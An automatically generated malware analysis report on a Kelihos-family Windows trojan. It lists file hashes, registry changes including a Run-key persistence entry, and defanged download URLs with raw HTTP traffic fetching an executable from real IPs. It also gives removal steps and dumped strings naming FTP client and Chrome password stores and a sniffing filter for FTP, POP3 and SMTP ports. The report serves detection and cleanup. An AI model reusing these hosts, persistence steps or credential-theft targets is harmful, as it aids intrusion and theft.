Trojan.Win32.Inject.aaybx (Kaspersky), Gen:Variant.Zusy.205305 (B) (Emsisoft), Gen:Variant.Zusy.205305 (AdAware), Backdoor.Win32.Kelihos.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: c63f82eb2281e2749945a1956ea88d1e
SHA1: c3c193ae0f5d60cb34657c0a33d785896c562608
SHA256: 0a3c2de15e17a3547a93c61d8b95ee5dedd4a2f4d6a8e1a73f30767cf99f907e
SSDeep: 3072:zWkf02fLFiUYbN7VnY70MR1Ueo1cyzivsLBXw:ykRfBiUON7RYwMrlUbNXw
Size: 110402 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-08-30 09:47:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408
The Trojan injects its code into the following process(es):
temp1613017254.exe:1076
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)
The process temp1613017254.exe:1076 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp.exe (0 bytes)
Registry activity
The process %original file name%.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 4C 65 4F 37 1D BB 77 6F CB 8F 5F 09 F8 69 4C"
The process %original file name%.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 C9 89 ED 3A CE 1F 41 B1 29 76 B6 7D E1 54 CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process temp1613017254.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 94 01 65 8D D8 FB C3 EE 17 6A F1 5A 19 F0 C5"
[HKCU\Software\Microsoft\Notepad]
"SizeCompletedValid" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
[HKCU\Software\Sysinternals\Process Monitor]
"UrlEnabledUse" = "80"
[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"EnableStationQueries" = "1"
"ComputerName" = "XP7"
[HKCU\Software\Microsoft\Notepad]
"InfoPlayedCurrent" = "00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DBSavedUse" = "A2 49 4D F3 D9 1E 9F 88 01 01 08 6A 00 03 98 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Sysinternals\Process Monitor]
"FlagsModifiedValid" = "00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Notepad]
"StyleModifiedPrev" = "80"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"PlatformCompressedValid" = "00 00 00 00 00 00 00 00"
"PersistentLocalizedName" = "CB 80 F9 7F 7A 92 E2 AE 4A E9 9E 3D 21 85 B5 92"
[HKCU\Software\Sysinternals\Process Monitor]
"DefaultCompressedRecord" = "CB 80 F9 7F 73 B0 96 97 A5 6D BA E1 E2 08 86 E7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Notepad]
"ActiveModifiedTheme" = "CB 80 F9 7F 87 E1 B4 EE C3 B9 D7 46 28 5C D8 5E"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"RecordEnabledCheck" = "80"
[HKCU\Software\Sysinternals\Process Monitor]
"RecordModifiedMax" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"UserName" = "%CurrentUserName%"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"LineLoadedQuick" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe"
The process temp1613017254.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Dropped PE files
MD5 | File path |
---|---|
3353a9c88fcd77ed1bebae124b65beb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\temp1613017254.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 31702 | 32768 | 3.90163 | 34cba9b044ea2361fe8decdb4dd2f4f9 |
.rda | 36864 | 3049 | 4096 | 2.00959 | e34b57e2f529a2291a1dcefc4113a147 |
.data | 40960 | 577 | 4096 | 0.418623 | 53a6ec818c2bad848cb617cb887f0d7e |
.ida | 45056 | 3047 | 4096 | 3.03522 | aca78db13f3eda332808891c936edbb6 |
.rsrc | 49152 | 2272 | 4096 | 1.30331 | fc83d57640df09d44455480ea91c8d29 |
.reloc | 53248 | 1853 | 4096 | 2.21907 | 915194c4e62a60b03de6669744081d07 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 19
Network Activity
URLs
URL | IP |
---|---|
hxxp://193.28.179.40/omydarl.exe | |
hxxp://95.104.39.96/online.htm | |
hxxp://95.104.39.96/setup.htm | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /omydarl.exe HTTP/1.0
Host: 193.28.179.40
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Wed, 21 Sep 2016 19:35:04 GMT
Content-Type: application/octet-stream
Content-Length: 1088759
Connection: close
Last-Modified: Wed, 21 Sep 2016 19:21:09 GMT
ETag: "57e2dda5-109cf7"
Accept-Ranges: bytes
GET /online.htm HTTP/1.1
Host: 95.104.39.96
Content-Length: 164
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
HTTP/1.1 200
Server: Apache
Content-Length: 229
Content-Type:
Last-Modified: .., 21 ... 2016 19:35:28 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Wed, 21 Sep 2016 19:35:33 GMT
Last-Modified:Wed, 21 Sep 2016 19:35:33 GMT
Accept-Ranges:bytes
GET /setup.htm HTTP/1.1
Host: 95.104.39.96
Content-Length: 1912
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)
HTTP/1.1 200
Server: Apache
Content-Length: 34895
Content-Type:
Last-Modified: .., 21 ... 2016 19:35:29 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Wed, 21 Sep 2016 19:35:34 GMT
Last-Modified:Wed, 21 Sep 2016 19:35:34 GMT
Accept-Ranges:bytes
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
temp1613017254.exe_1076:
'vrrp' modifier applied to %s
'icmp6' modifier applied to %s
'icmp6' modifier applied to %s
'ah' modifier applied to %s
'ah' modifier applied to %s
'esp' modifier applied to %s
'esp' modifier applied to %s
'esis' modifier applied to %s
'esis' modifier applied to %s
'isis' modifier applied to %s
'isis' modifier applied to %s
'clnp' modifier applied to %s
'clnp' modifier applied to %s
'stp' modifier applied to %s
'stp' modifier applied to %s
'netbeui' modifier applied to %s
'netbeui' modifier applied to %s
'radio' modifier applied to %s
'radio' modifier applied to %s
'ip' modifier applied to ip6 %s
'ip' modifier applied to ip6 %s
'rarp' modifier applied to ip6 %s
'rarp' modifier applied to ip6 %s
'arp' modifier applied to ip6 %s
'arp' modifier applied to ip6 %s
'decnet' modifier applied to ip6 %s
'decnet' modifier applied to ip6 %s
unknown ip proto '%s'
unknown ip proto '%s'
unknown ether proto '%s'
unknown ether proto '%s'
unknown osi proto '%s'
unknown osi proto '%s'
'protochain' not supported with 802.11
'protochain' not supported with 802.11
unsupported proto to gen_protochain
unsupported proto to gen_protochain
'udp proto' is bogus
'udp proto' is bogus
'tcp proto' is bogus
'tcp proto' is bogus
unknown network '%s'
unknown network '%s'
unknown ether host '%s'
unknown ether host '%s'
unknown FDDI host '%s'
unknown FDDI host '%s'
unknown token ring host '%s'
unknown token ring host '%s'
unknown 802.11 host '%s'
unknown 802.11 host '%s'
unknown Fibre Channel host '%s'
unknown Fibre Channel host '%s'
only ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel supports link-level host name
only ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel supports link-level host name
unknown host '%s'
unknown host '%s'
unknown host '%s'%s
unknown host '%s'%s
illegal qualifier of 'port'
illegal qualifier of 'port'
unknown port '%s'
unknown port '%s'
port '%s' is tcp
port '%s' is tcp
port '%s' is sctp
port '%s' is sctp
port '%s' is udp
port '%s' is udp
illegal qualifier of 'portrange'
illegal qualifier of 'portrange'
unknown port in range '%s'
unknown port in range '%s'
port in range '%s' is tcp
port in range '%s' is tcp
port in range '%s' is sctp
port in range '%s' is sctp
port in range '%s' is udp
port in range '%s' is udp
'gateway' not supported in this configuration
'gateway' not supported in this configuration
unknown protocol: %s
unknown protocol: %s
non-network bits set in "%s mask %s"
non-network bits set in "%s mask %s"
non-network bits set in "%s/%d"
non-network bits set in "%s/%d"
invalid ip6 address %s
invalid ip6 address %s
%s resolved to multiple address
%s resolved to multiple address
mask length must be
mask length must be
ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
unsupported index operation
unsupported index operation
IPv6 upper-layer protocol is not supported by proto[x]
IPv6 upper-layer protocol is not supported by proto[x]
only link-layer/IP broadcast filters supported
only link-layer/IP broadcast filters supported
link-layer multicast filters supported only on ethernet/FDDI/token ring/ARCNET/802.11/ATM LANE/Fibre Channel
link-layer multicast filters supported only on ethernet/FDDI/token ring/ARCNET/802.11/ATM LANE/Fibre Channel
inbound/outbound not supported on linktype %d
inbound/outbound not supported on linktype %d
libpcap was compiled without pf support
libpcap was compiled without pf support
libpcap was compiled on a machine without pf support
libpcap was compiled on a machine without pf support
802.11 link-layer types supported only on 802.11
802.11 link-layer types supported only on 802.11
frame direction supported only with 802.11 headers
frame direction supported only with 802.11 headers
aid supported only on ARCnet
aid supported only on ARCnet
no VLAN support for data link type %d
no VLAN support for data link type %d
no MPLS support for data link type %d
no MPLS support for data link type %d
'vpi' supported only on raw ATM
'vpi' supported only on raw ATM
'vci' supported only on raw ATM
'vci' supported only on raw ATM
'callref' supported only on raw ATM
'callref' supported only on raw ATM
'metac' supported only on raw ATM
'metac' supported only on raw ATM
'bcc' supported only on raw ATM
'bcc' supported only on raw ATM
'oam4sc' supported only on raw ATM
'oam4sc' supported only on raw ATM
'oam4ec' supported only on raw ATM
'oam4ec' supported only on raw ATM
'sc' supported only on raw ATM
'sc' supported only on raw ATM
'ilmic' supported only on raw ATM
'ilmic' supported only on raw ATM
'lane' supported only on raw ATM
'lane' supported only on raw ATM
'llc' supported only on raw ATM
'llc' supported only on raw ATM
'fisu' supported only on MTP2
'fisu' supported only on MTP2
'lssu' supported only on MTP2
'lssu' supported only on MTP2
'msu' supported only on MTP2
'msu' supported only on MTP2
'sio' supported only on SS7
'sio' supported only on SS7
sio value %u too big; max value = 255
sio value %u too big; max value = 255
'opc' supported only on SS7
'opc' supported only on SS7
opc value %u too big; max value = 16383
opc value %u too big; max value = 16383
'dpc' supported only on SS7
'dpc' supported only on SS7
dpc value %u too big; max value = 16383
dpc value %u too big; max value = 16383
'sls' supported only on SS7
'sls' supported only on SS7
sls value %u too big; max value = 15
sls value %u too big; max value = 15
'oam' supported only on raw ATM
'oam' supported only on raw ATM
'oamf4' supported only on raw ATM
'oamf4' supported only on raw ATM
'connectmsg' supported only on raw ATM
'connectmsg' supported only on raw ATM
'metaconnect' supported only on raw ATM
'metaconnect' supported only on raw ATM
'port' modifier applied to ip host
'port' modifier applied to ip host
'portrange' modifier applied to ip host
'portrange' modifier applied to ip host
%d-%d
%d-%d
%d.%d
%d.%d
malformed decnet address '%s'
malformed decnet address '%s'
decnet name support not included, '%s' cannot be translated
decnet name support not included, '%s' cannot be translated
%s for block-local relative jump: off=%d
%s for block-local relative jump: off=%d
malloc() failed: %s
malloc() failed: %s
%s '%s' %s
%s '%s' %s
Error when listing files: does folder '%s' exist?
Error when listing files: does folder '%s' exist?
%s '%s' %s %s
%s '%s' %s %s
[%[1234567890:.]]:%[^/]/%s
[%[1234567890:.]]:%[^/]/%s
[%[1234567890:.]]/%s
[%[1234567890:.]]/%s
%[^/:]:%[^/]/%s
%[^/:]:%[^/]/%s
%[^/]/%s
%[^/]/%s
Source type not supported
Source type not supported
getaddrinfo() %s
getaddrinfo() %s
(%s) and not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
(%s) and not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
TcApi.dll
TcApi.dll
TcQueryPortList
TcQueryPortList
TcFreePortList
TcFreePortList
TcPortGetName
TcPortGetName
TcPortGetDescription
TcPortGetDescription
TcPacketsBufferCreate
TcPacketsBufferCreate
TcPacketsBufferDestroy
TcPacketsBufferDestroy
TcPacketsBufferQueryNextPacket
TcPacketsBufferQueryNextPacket
TcPacketsBufferCommitNextPacket
TcPacketsBufferCommitNextPacket
Error opening TurboCap adapter: %s
Error opening TurboCap adapter: %s
Error enabling reception on a TurboCap instance: %s
Error enabling reception on a TurboCap instance: %s
Error setting the read timeout a TurboCap instance: %s
Error setting the read timeout a TurboCap instance: %s
Getting the non blocking status is not available for TurboCap ports
Getting the non blocking status is not available for TurboCap ports
Setting the non blocking status is not available for TurboCap ports
Setting the non blocking status is not available for TurboCap ports
send error: the TurboCap API does not support packets larger than 64k
send error: the TurboCap API does not support packets larger than 64k
send error: TcPacketsBufferCreate failure: %s (x)
send error: TcPacketsBufferCreate failure: %s (x)
send error: TcInstanceTransmitPackets failure: %s (x)
send error: TcInstanceTransmitPackets failure: %s (x)
send error: TcPacketsBufferCommitNextPacket failure: %s (x)
send error: TcPacketsBufferCommitNextPacket failure: %s (x)
read error, TcInstanceReceivePackets failure: %s (x)
read error, TcInstanceReceivePackets failure: %s (x)
read error, TcPacketsBufferQueryNextPacket failure: %s (x)
read error, TcPacketsBufferQueryNextPacket failure: %s (x)
TurboCap error setting the mintocopy: %s (x)
TurboCap error setting the mintocopy: %s (x)
Mode %u not supported by TurboCap devices. TurboCap only supports capture.
Mode %u not supported by TurboCap devices. TurboCap only supports capture.
TurboCap error in TcInstanceQueryStatistics: %s (x)
TurboCap error in TcInstanceQueryStatistics: %s (x)
TurboCap error in TcStatisticsQueryValue: %s (x)
TurboCap error in TcStatisticsQueryValue: %s (x)
setfilter, unable to install the filter: %s
setfilter, unable to install the filter: %s
PacketGetStats error: %s
PacketGetStats error: %s
Error opening adapter: %s
Error opening adapter: %s
Cannot determine the network type: %s
Cannot determine the network type: %s
Error calling PacketSetMinToCopy: %s
Error calling PacketSetMinToCopy: %s
Driver error: cannot set bpf filter: %s
Driver error: cannot set bpf filter: %s
PacketSetReadTimeout: %s
PacketSetReadTimeout: %s
IEEE 802.15.4 with non-ASK PHY data
IEEE 802.15.4 with non-ASK PHY data
Bluetooth HCI UART transport layer plus pseudo-header
Bluetooth HCI UART transport layer plus pseudo-header
IEEE 802.15.4
IEEE 802.15.4
IEEE 802.15.4 with Linux padding
IEEE 802.15.4 with Linux padding
Bluetooth HCI UART transport layer
Bluetooth HCI UART transport layer
Juniper Passive Monitor PIC
Juniper Passive Monitor PIC
can't perform operation on activated capture
can't perform operation on activated capture
%s: %s
%s: %s
%s is not one of the DLTs supported by this device
%s is not one of the DLTs supported by this device
DLT %d is not one of the DLTs supported by this device
DLT %d is not one of the DLTs supported by this device
That device doesn't support promiscuous mode
That device doesn't support promiscuous mode
That device doesn't support monitor mode
That device doesn't support monitor mode
That operation is supported only in monitor mode
That operation is supported only in monitor mode
Unknown error: %d
Unknown error: %d
Sending packets isn't supported on savefiles
Sending packets isn't supported on savefiles
Setting direction is not supported on savefiles
Setting direction is not supported on savefiles
error reading dump file: %s
error reading dump file: %s
truncated dump file; tried to read %u captured bytes, only got %lu
truncated dump file; tried to read %u captured bytes, only got %lu
Can't write to %s: %s
Can't write to %s: %s
%s: link-layer type %d isn't supported in savefiles
%s: link-layer type %d isn't supported in savefiles
bogus IPv6 address %s
bogus IPv6 address %s
bogus ethernet address %s
bogus ethernet address %s
illegal token: %s
illegal token: %s
illegal char '%c'
illegal char '%c'
%sUnable to get the exact error message
%sUnable to get the exact error message
%s%s (code %d)
%s%s (code %d)
%s (code %d)
%s (code %d)
Is the server properly installed on %s? connect() failed: %s
Is the server properly installed on %s? connect() failed: %s
getaddrinfo(): socket type not supported
getaddrinfo(): socket type not supported
getaddrinfo(): multicast addresses are not valid when using TCP streams
getaddrinfo(): multicast addresses are not valid when using TCP streams
Cannot retrieve the extended statistics from a file or a TurboCap port
Cannot retrieve the extended statistics from a file or a TurboCap port
PacketGetStatsEx error: %s
PacketGetStatsEx error: %s
Cannot transmit a queue to an offline capture or to a TurboCap port
Cannot transmit a queue to an offline capture or to a TurboCap port
Impossible to set user buffer while reading from a file or on a TurboCap port
Impossible to set user buffer while reading from a file or on a TurboCap port
Error: invalid size %d
Error: invalid size %d
live dump needs a physical interface supported by the NPF driver
live dump needs a physical interface supported by the NPF driver
wrong interface type. A physical interface supported by the NPF driver is needed
wrong interface type. A physical interface supported by the NPF driver is needed
e:\releases\winpcap_4_1_0_1753\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb
e:\releases\winpcap_4_1_0_1753\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb
WS2_32.dll
WS2_32.dll
packet.dll
packet.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
wpcap.dll
wpcap.dll
> >$>(>,>
> >$>(>,>
: :$:(:,:0:4:
: :$:(:,:0:4:
7*848=8`8
7*848=8`8
?'?,?0?4?]?
?'?,?0?4?]?
3 3
3 3
.Xa6(
.Xa6(
Export
Export
system32\drivers\NPF.sys
system32\drivers\NPF.sys
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\%s
\\.\%s
\\.\%s
\\.\Global\%s
\\.\Global\%s
npp\ndisnpp.dll
npp\ndisnpp.dll
e:\releases\winpcap_4_1_0_1753\winpcap\packetNtx\Dll\Project\Release\x86\Packet.pdb
e:\releases\winpcap_4_1_0_1753\winpcap\packetNtx\Dll\Project\Release\x86\Packet.pdb
VERSION.dll
VERSION.dll
NPPTools.dll
NPPTools.dll
iphlpapi.dll
iphlpapi.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
1"1 141;1
1"1 141;1
435:5`5|5
435:5`5|5
0&10191\1
0&10191\1
9.:4:8:<:>
9.:4:8:<:>
= =@=`=|=
= =@=`=|=
: this object doesn't support resynchronization
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
StreamTransformation: this object doesn't support random access
CryptoMaterial: this object does not support precomputation
CryptoMaterial: this object does not support precomputation
GeneratableCryptoMaterial: this object does not support key/parameter generation
GeneratableCryptoMaterial: this object does not support key/parameter generation
PK_MessageEncodingMethod: this signature scheme does not support message recovery
PK_MessageEncodingMethod: this signature scheme does not support message recovery
/index.html
/index.html
HTTP/1.1
HTTP/1.1
text/html; charset=windows-1251
text/html; charset=windows-1251
The requested URL
The requested URL
HTTP/1.1
HTTP/1.1
Clean up all keys.
Clean up all keys.
Use next keys:
Use next keys:
REG keys[
REG keys[
Use REG keys:
Use REG keys:
Gen new port key!
Gen new port key!
Gen new job key!
Gen new job key!
Gen new list key!
Gen new list key!
/dev/index.html
/dev/index.html
No i key:
No i key:
No m key:
No m key:
No p key:
No p key:
No j key:
No j key:
No r key:
No r key:
Err in ID key: decr:
Err in ID key: decr:
Err in ID key: check
Err in ID key: check
Err in ID key: invalid
Err in ID key: invalid
goloduha.info
goloduha.info
Check Compromzed REG key:
Check Compromzed REG key:
Compromzed REG key:
Compromzed REG key:
C:\boost\include\boost-1_47\boost/exception/detail/exception_ptr.hpp
C:\boost\include\boost-1_47\boost/exception/detail/exception_ptr.hpp
Keys3
Keys3
Appkey
Appkey
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
webscanx
webscanx
hkcmd
hkcmd
firefox
firefox
em_exec
em_exec
CrashReport
CrashReport
\tmp.exe
\tmp.exe
*.exe
*.exe
explorer.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Mozilla/5.0 (Windows; U; Windows NT
Mozilla/5.0 (Windows; U; Windows NT
; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
SMTP:
SMTP:
%d.%d.%d.%d
%d.%d.%d.%d
!#$%&'* -/=?^_`{|}~
!#$%&'* -/=?^_`{|}~
.in-addr.arpa
.in-addr.arpa
: Maximum attempts exeeded
: Maximum attempts exeeded
%s, %d %s %d d:d:d %cdd
%s, %d %s %d d:d:d %cdd
dddddd
dddddd
ddddd
ddddd
x.8lx$.8lx$x@%s
x.8lx$.8lx$x@%s
----=_NextPart_d_X_.8lX..8lX
----=_NextPart_d_X_.8lX..8lX
password
password
F/c "start Ã%\
F/c "start Ã%\
&& %windir%\explorer Ã%\
&& %windir%\explorer Ã%\
%SystemRoot%\system32\shell32.dll
%SystemRoot%\system32\shell32.dll
npf.sys
npf.sys
Packet.dll
Packet.dll
( tcp dst port 21 ) or ( tcp dst port 110 ) or ( tcp dst port 25 )
( tcp dst port 21 ) or ( tcp dst port 110 ) or ( tcp dst port 25 )
smtp
smtp
pop3_smtp
pop3_smtp
HostPassword
HostPassword
HostPort
HostPort
32BitFtp.ini
32BitFtp.ini
0003DFTP
0003DFTP
3D-FTP
3D-FTP
sites.ini
sites.ini
\3D-FTP
\3D-FTP
Password
Password
Port
Port
port
port
QData.dat
QData.dat
ESTdb2.dat
ESTdb2.dat
\Estsoft\ALFTP
\Estsoft\ALFTP
TYPE = SFTP
TYPE = SFTP
sftp
sftp
SET PASS
SET PASS
bitkinex.ds
bitkinex.ds
LastPassword
LastPassword
LastPort
LastPort
BlazeFtp
BlazeFtp
site.dat
site.dat
\BlazeFtp
\BlazeFtp
Software\FlashPeak\BlazeFtp\Settings
Software\FlashPeak\BlazeFtp\Settings
*.dat
*.dat
*.bps
*.bps
Software\BPFTP
Software\BPFTP
Chrome
Chrome
PTF://
PTF://
origin_url
origin_url
password_value
password_value
logins
logins
SQLite format 3
SQLite format 3
Web Data
Web Data
Login Data
Login Data
Google\Chrome
Google\Chrome
ChromePlus
ChromePlus
Nichrome
Nichrome
MapleStudio\ChromePlus
MapleStudio\ChromePlus
browser.yandex
browser.yandex
Software\ChromePlus
Software\ChromePlus
_Password
_Password
FtpServer
FtpServer
FtpUserName
FtpUserName
FtpPassword
FtpPassword
_FtpPassword
_FtpPassword
FtpDirectory
FtpDirectory
FtpDescription
FtpDescription
Software\NCH Software\ClassicFTP\FTPAccounts
Software\NCH Software\ClassicFTP\FTPAccounts
FTP destination server
FTP destination server
FTP destination user
FTP destination user
FTP destination password
FTP destination password
FTP destination catalog
FTP destination catalog
FTP destination port
FTP destination port
FTP profiles
FTP profiles
Software\FTPWare\COREFTP\Sites
Software\FTPWare\COREFTP\Sites
ftps
ftps
CSMFTPItem
CSMFTPItem
sm.dat
sm.dat
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\CuteFTP
CUTEFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
user.config
user.config
*.duck
*.duck
Nickname
Nickname
sites.xml
sites.xml
DeluxeFTP
DeluxeFTP
FTP-Now
FTP-Now
FTPNow
FTPNow
FTP Now
FTP Now
LOGIN
LOGIN
PASSWORD
PASSWORD
PORT
PORT
*.oxc
*.oxc
*.oll
*.oll
ftplast.osd
ftplast.osd
EasyFTP
EasyFTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
\Plugins\FTP\Hosts
\Plugins\FTP\Hosts
\SavedDialogHistory\FTPHost
\SavedDialogHistory\FTPHost
FTPList.db
FTPList.db
DefaultPassword
DefaultPassword
Software\Sota\FFFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\Sota\FFFTP\Options
Server.Port
Server.Port
Server.Pass
Server.Pass
Server.User
Server.User
Server.Host
Server.Host
Last Server Port
Last Server Port
Last Server Pass
Last Server Pass
Sites.dat
Sites.dat
Quick.dat
Quick.dat
History.dat
History.dat
ServerPass
ServerPass
SharedSettings.ccs
SharedSettings.ccs
SharedSettings_1_0_5.ccs
SharedSettings_1_0_5.ccs
SharedSettings.sqlite
SharedSettings.sqlite
SharedSettings_1_0_5.sqlite
SharedSettings_1_0_5.sqlite
FreshFTP
FreshFTP
*.SMF
*.SMF
FtpSite.xml
FtpSite.xml
QuickFtp
QuickFtp
FTP Commander
FTP Commander
usessh
usessh
ftplist.txt
ftplist.txt
FTP Navigator
FTP Navigator
*.prf
*.prf
FTP CONTROL
FTP CONTROL
Login
Login
PasswordType
PasswordType
CFTPToolBarComboBoxButton
CFTPToolBarComboBoxButton
profiles.xml
profiles.xml
\FTP Explorer
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTP Explorer\Profiles
ftpx
ftpx
Software\MAS-Soft\FTPInfo\Setup
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
ServerList.xml
\FTPInfo
\FTPInfo
RushSite.xml
RushSite.xml
\FTPRush
\FTPRush
FTPShell
FTPShell
ftpshell.fsi
